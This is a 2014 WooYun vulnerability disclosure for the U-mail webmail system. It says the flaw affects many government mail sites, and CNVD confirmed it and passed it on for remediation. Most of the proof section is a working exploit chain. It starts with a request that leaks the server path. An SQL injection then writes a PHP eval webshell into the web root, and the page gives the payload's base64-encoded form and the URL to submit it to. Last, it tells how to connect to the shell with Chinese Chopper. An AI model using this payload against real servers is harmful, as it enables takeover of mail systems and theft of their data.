当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049525

漏洞标题:大部分网站政府网站U-mail存在直接拿shell漏洞

相关厂商:大部分政府网站邮箱

漏洞作者: Saknc

提交时间:2014-01-22 11:11

修复时间:2014-03-08 11:11

公开时间:2014-03-08 11:11

漏洞类型:系统/服务补丁不及时

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-22: 细节已通知厂商并且等待厂商处理中
2014-01-27: 厂商已经确认,细节仅向厂商公开
2014-02-06: 细节向核心白帽子及相关领域专家公开
2014-02-16: 细节向普通白帽子公开
2014-02-26: 细节向实习白帽子公开
2014-03-08: 细节向公众公开

简要描述:

u-mail中某个文件由于参数过滤不严谨导致产生了SQL注入,通过此漏洞可以将shell写入到web目录下

详细说明:

u-mail中某个文件由于参数过滤不严谨导致产生了SQL注入,通过此漏洞可以将shell写入到web目录下

漏洞证明:

加入

webmail/userapply.php?execadd=333&DomainID=111

直接爆出物理地址

1.png


然后将

aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/WorldClient/html/saknc.php'#


用base64编译一下

YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1QxKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRDovdW1haWwvV29ybGRDbGllbnQvaHRtbC9zYWtuYy5waHAnIw==


2.png


然后

网站.com/webmail/fileshare.php?file=加上上面编译的base64代码


可直接写入shell saknc.php
用菜刀连接

网站.com/webmail/saknc.php


密码:shell
并且大部分政府网站的u-mail都存在这个漏洞

修复方案:

你们比我懂

版权声明:转载请注明来源 Saknc@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-01-27 09:03

厂商回复:

CNVD确认并在多个实例上复现所述情况,在测试过程中有两个新情况:1、并非所有采用Umail的实例都存在所述漏洞,还与网站目录权限配置相关;2、白帽子提交的exp与互联网上其他地方公开的EXP相同,在webshell编写上存在一些小错误(CNVD已经更正)。
CNVD将陆续整理测试案例,分两步同步处置:1、联系软件生产厂商;2、根据测试的实例,下发各分中心协调处置。
rank20

最新状态:

暂无


漏洞评价:

评论

  1. 2014-01-22 12:52 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    你是照我说的这个搞的么?http://www.08sec.com/thread-2626-1-1.html